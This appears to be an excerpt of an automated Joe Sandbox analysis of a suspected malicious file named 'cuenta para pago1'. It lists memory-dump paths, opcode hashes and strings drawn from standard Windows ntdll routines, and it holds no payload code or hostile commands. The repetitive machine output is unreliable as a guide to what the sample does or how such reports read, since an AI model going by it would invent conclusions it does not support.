                                                                                      • Instruction ID: 4b16be7ee5cbccba1650c4f3fbc1a7e8e57b82745b95869334238fc14aa2474e
                                                                                      • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                      • Instruction Fuzzy Hash: C0D05E32051610EEEB326F28ED05F937AB5AF40B10F050A28B191169F486E1ED84C6A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d79aac671ffe189ed0226c7c4891cec551d0514225a7436e8e51fcb3797c70a
                                                                                      • Instruction ID: 66753d15fd80f2fe84010d68363afed8e2362c76448b6eee9091f163c8a4a806
                                                                                      • Opcode Fuzzy Hash: 4d79aac671ffe189ed0226c7c4891cec551d0514225a7436e8e51fcb3797c70a
                                                                                      • Instruction Fuzzy Hash: 5F90027120110802D540B1584504746101547D0345F51C496A5155514EC66DCDDA7665
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f3d2450f858817f564531e66fa0b7ff4785b3df4ac4dd6ef1fa3c1e885432b8a
                                                                                      • Instruction ID: ad05e09c6504eb824460b52b2634d48b5bfec07b76c221004e25dd10d392f49c
                                                                                      • Opcode Fuzzy Hash: f3d2450f858817f564531e66fa0b7ff4785b3df4ac4dd6ef1fa3c1e885432b8a
                                                                                      • Instruction Fuzzy Hash: DA90022130110802D502A1584514606101987D1389F91C497E1515515DC63DC957B132
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eb92e6000556dd2178bb01d895e21aa711107c0373e92141eb443a8d10c3d504
                                                                                      • Instruction ID: b61f65373023727ddb821b53358fc7b4d11b1c4731c215b7a400a8d5b364b962
                                                                                      • Opcode Fuzzy Hash: eb92e6000556dd2178bb01d895e21aa711107c0373e92141eb443a8d10c3d504
                                                                                      • Instruction Fuzzy Hash: DC900261601204424540B1584904406701557E1345391C59AA0645520CC62CC85AB269
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d78d05e6b88fface2ac54a6fc9bd85ba9e458700ff936410c1cc1aee3c24855b
                                                                                      • Instruction ID: 990b440a125782a72252df9d975554a3e81b675d2464e1a640fcb9225736a9b5
                                                                                      • Opcode Fuzzy Hash: d78d05e6b88fface2ac54a6fc9bd85ba9e458700ff936410c1cc1aee3c24855b
                                                                                      • Instruction Fuzzy Hash: 4F90047131110443D504F15C4504707105547F1345F51C4D7F3345514CC53DCC777135
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3eaf4cf566a1b924bf0b565767a124a4b704406217eed3030a64ed8249d8870d
                                                                                      • Instruction ID: 32cc9e6a32c1c59ec8b529d270454c6c59e4b0b6dd813bad37e92e6f4d4ad582
                                                                                      • Opcode Fuzzy Hash: 3eaf4cf566a1b924bf0b565767a124a4b704406217eed3030a64ed8249d8870d
                                                                                      • Instruction Fuzzy Hash: 7A90023120150802D500A158491470B101547D0346F51C496A1255515DC63DC8567571
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d8932795cf0f56939f4f7454ffa7b1f8d49efd13abb4c53a7935350f309eebd
                                                                                      • Instruction ID: a18dea801a5ae5256a661cff7dd11653b8622d746271ec628659ef1c46f9eb30
                                                                                      • Opcode Fuzzy Hash: 3d8932795cf0f56939f4f7454ffa7b1f8d49efd13abb4c53a7935350f309eebd
                                                                                      • Instruction Fuzzy Hash: F3900221601104424540B168894490650156BE1255751C5A6A0A89510DC56DC86A7665
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e939796ca6b7b1cacc4a471d3e6e31596d3d1aec44492b0ba87343de97f9d09
                                                                                      • Instruction ID: e79077f97a0ef578861cba2bdc4fde27ada1ce31110b8a98e35e0e7ee399f995
                                                                                      • Opcode Fuzzy Hash: 4e939796ca6b7b1cacc4a471d3e6e31596d3d1aec44492b0ba87343de97f9d09
                                                                                      • Instruction Fuzzy Hash: C290023120150802D500A1584908747101547D0346F51C496A5255515EC67DC8967531
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff6e0ffe054fa5985af6b438b9d11169bbd8951832f5392d4559265fcd2ca536
                                                                                      • Instruction ID: 7efae620f2a852c93aa0af16e1b00194e17d16e44b8afcd9e22a72606345dc10
                                                                                      • Opcode Fuzzy Hash: ff6e0ffe054fa5985af6b438b9d11169bbd8951832f5392d4559265fcd2ca536
                                                                                      • Instruction Fuzzy Hash: 7990026120150803D540A5584904607101547D0346F51C496A2155515ECA3DCC567135
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce7080ea6bbd3f72f82ea46ddc4a856041952d3eb09cd9f1e9f02ba39bda2263
                                                                                      • Instruction ID: c36f971c123394f443548fc9987ae181b5eec3aca5b5ced167afd2dfa307639e
                                                                                      • Opcode Fuzzy Hash: ce7080ea6bbd3f72f82ea46ddc4a856041952d3eb09cd9f1e9f02ba39bda2263
                                                                                      • Instruction Fuzzy Hash: D590026134110842D500A1584514B06101587E1345F51C49AE1155514DC62DCC577126
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fd0b1624ac32b3b8c921b4508b88590d4f69b5afdfba495885d78dacc21372b
                                                                                      • Instruction ID: 63a364cff74006a6414852c7daaaffa4693999276b34053edcb735f45ac8c44c
                                                                                      • Opcode Fuzzy Hash: 7fd0b1624ac32b3b8c921b4508b88590d4f69b5afdfba495885d78dacc21372b
                                                                                      • Instruction Fuzzy Hash: A990022124110C02D540B1588514707101687D0645F51C496A0115514DC62EC96A76B1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b3368982f7461e396429025293ce7771c2dd154a1d7e1a90270212ae08bcd19
                                                                                      • Instruction ID: 206b3aecad9311e04a3d90f60848cf4633b33bd46a4340e90771c6f1655eef91
                                                                                      • Opcode Fuzzy Hash: 5b3368982f7461e396429025293ce7771c2dd154a1d7e1a90270212ae08bcd19
                                                                                      • Instruction Fuzzy Hash: 4190022121190442D600A5684D14B07101547D0347F51C59AA0245514CC92DC8667521
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 02eb1adb90272add0b02eacd6b78fcf272cc25b19d5ea256d17dbaeac6e52ae5
                                                                                      • Instruction ID: 267e818f1d065a33cc9b08fa5306f956c94f1ff2f0ce37f3253138924ff9236e
                                                                                      • Opcode Fuzzy Hash: 02eb1adb90272add0b02eacd6b78fcf272cc25b19d5ea256d17dbaeac6e52ae5
                                                                                      • Instruction Fuzzy Hash: 1C90022120154842D540A2584904B0F511547E1246F91C49EA4247514CC92DC85A7721
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32e62ec50cf0adf819a0c541a346a3363e654ad14f3d07cbb29c256984281289
                                                                                      • Instruction ID: 646daaec1ab65ee0207c748066a42b9eb81e9b51cf4db5833e7e1bdc1d834e75
                                                                                      • Opcode Fuzzy Hash: 32e62ec50cf0adf819a0c541a346a3363e654ad14f3d07cbb29c256984281289
                                                                                      • Instruction Fuzzy Hash: A3900231605504129540B1584984546501557E0345B51C496E0515514CCA2CC95B7361
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      [Figure: control-flow graph beginning at block 3499a1f0, with repeated calls to RtlDebugPrintTimes. Legend: Executed / Not Executed.]
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP:
                                                                                      • API String ID: 3446177414-2466845122
                                                                                      • Opcode ID: 54d855047e76dd8addf80a13063d253e54c0adbc08fe5b01bfdabe9b5a3f08bd
                                                                                      • Instruction ID: 1ea2bb0e1969761e347b0c55386b7724efba3f1bc65f85fb9297f12210982642
                                                                                      • Opcode Fuzzy Hash: 54d855047e76dd8addf80a13063d253e54c0adbc08fe5b01bfdabe9b5a3f08bd
                                                                                      • Instruction Fuzzy Hash: 85A1BB757183528FE714CE28C894A5ABBEAFF88350F14456DE945DB320EB70EC45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 34934592
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3493454D
                                                                                      • ExecuteOptions, xrefs: 349344AB
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34934460
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 34934507
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34934530
                                                                                      • Execute=1, xrefs: 3493451E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      • Opcode ID: 2899e880deb0b984a03890428cd0df1949672dc30139f651c2a1da7af0788bd4
                                                                                      • Instruction ID: 4a904d8946d9ffbe5d29eb17a3bf3dc0d942eebab8030b12e1b5cbb7136f748c
                                                                                      • Opcode Fuzzy Hash: 2899e880deb0b984a03890428cd0df1949672dc30139f651c2a1da7af0788bd4
                                                                                      • Instruction Fuzzy Hash: 6651D675A00219EEFF109FA4EC95FA977ACEF08344F4006E9E505A7281EB71AE45CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34927807
                                                                                      • SsHd, xrefs: 348DA304
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 349277E2
                                                                                      • Actx , xrefs: 34927819, 34927880
                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 349278F3
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 349277DD, 34927802
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                      • API String ID: 0-1988757188
                                                                                      • Opcode ID: b4eba345bebf16f60d4c90a03a8a3ccd4d6eadadc5cc6a544af1af491a5ba78f
                                                                                      • Instruction ID: 180dbf904b0868a163110eba0592640561f5c8f3e43d8e988544b1ca26ddae59
                                                                                      • Opcode Fuzzy Hash: b4eba345bebf16f60d4c90a03a8a3ccd4d6eadadc5cc6a544af1af491a5ba78f
                                                                                      • Instruction Fuzzy Hash: 21E1E4746053068FE714CE6CC880B9A77FAFB86364F604B6DE865DB290D731D845CB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Strings
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34929178
                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34929372
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34929153
                                                                                      • Actx , xrefs: 34929315
                                                                                      • GsHd, xrefs: 348DD794
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 3492914E, 34929173
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                      • API String ID: 3446177414-2196497285
                                                                                      • Opcode ID: 1d74a696cf81278f70d39a881153ef41cec8798758604c6cfa59acb41fd349c2
                                                                                      • Instruction ID: 8a877454e213b30df60329343ce344143dfcda74458fac63eea8725f0b9fccec
                                                                                      • Opcode Fuzzy Hash: 1d74a696cf81278f70d39a881153ef41cec8798758604c6cfa59acb41fd349c2
                                                                                      • Instruction Fuzzy Hash: 4DE1CD74B09306DFE711CF24C880B5AB7E9BF89358F404A6DE8959B296D731E844CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$@$@wEw
                                                                                      • API String ID: 3446177414-2435863765
                                                                                      • Opcode ID: 080988a0f2566e60dd51711a6669239f3e0b057583097523771deaae47c68c8a
                                                                                      • Instruction ID: a0569d7b8ee88726fbb95b517595a25ce426d20a9fde4795dbd56967e72297a5
                                                                                      • Opcode Fuzzy Hash: 080988a0f2566e60dd51711a6669239f3e0b057583097523771deaae47c68c8a
                                                                                      • Instruction Fuzzy Hash: AB8118B1D0126DDFEB21CB54CC45BDEB6B8AB08750F0042EAE919B7250D7709E85CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 34919854, 34919895
                                                                                      • LdrpLoadShimEngine, xrefs: 3491984A, 3491988B
                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34919885
                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34919843
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-3589223738
                                                                                      • Opcode ID: 19a86d989bed22d929968dfb84b4e95b9779e937f4ea0412c121ca4f2134c690
                                                                                      • Instruction ID: 002c500ca3ff45cbd814169c420b231ba56df3260b79e0ee1a55f40d22ddbf04
                                                                                      • Opcode Fuzzy Hash: 19a86d989bed22d929968dfb84b4e95b9779e937f4ea0412c121ca4f2134c690
                                                                                      • Instruction Fuzzy Hash: 95510276A00358DFEF14DFACC854A9D7BAAEB45314F440269E491BB3A5CBB09C41CF85
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • HEAP: , xrefs: 3496ECDD
                                                                                      • ---------------------------------------, xrefs: 3496EDF9
                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3496EDE3
                                                                                      • Entry Heap Size , xrefs: 3496EDED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                      • API String ID: 3446177414-1102453626
                                                                                      • Opcode ID: e6ed24361da157956e32e85608e5dfbb30af6d900bbf32596492e93af25705cb
                                                                                      • Instruction ID: b4b251d7b36835458a1ae53b5843dcefc87fc93c73682ebba104f6eaf6d0447b
                                                                                      • Opcode Fuzzy Hash: e6ed24361da157956e32e85608e5dfbb30af6d900bbf32596492e93af25705cb
                                                                                      • Instruction Fuzzy Hash: D9419F39A00215DFEF05CF18C49495ABBEAFF8936872581A9D84AAB311D735EC42DF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 3493344A, 34933476
                                                                                      • LdrpFindDllActivationContext, xrefs: 34933440, 3493346C
                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 34933466
                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 34933439
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-3779518884
                                                                                      • Opcode ID: af69d6e8b08e11c0143f4b6b750466b9db3326a0b7c542868e9701d040a5b434
                                                                                      • Instruction ID: d5e3a78c1680c0415de68c768a86fde0e4cf757aed4ab97789dbadf03b333443
                                                                                      • Opcode Fuzzy Hash: af69d6e8b08e11c0143f4b6b750466b9db3326a0b7c542868e9701d040a5b434
                                                                                      • Instruction Fuzzy Hash: CE313BB6A0C315EFFB21DB04AC44A55B7A8EB21B94F46936BE84067250F7B29D80C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
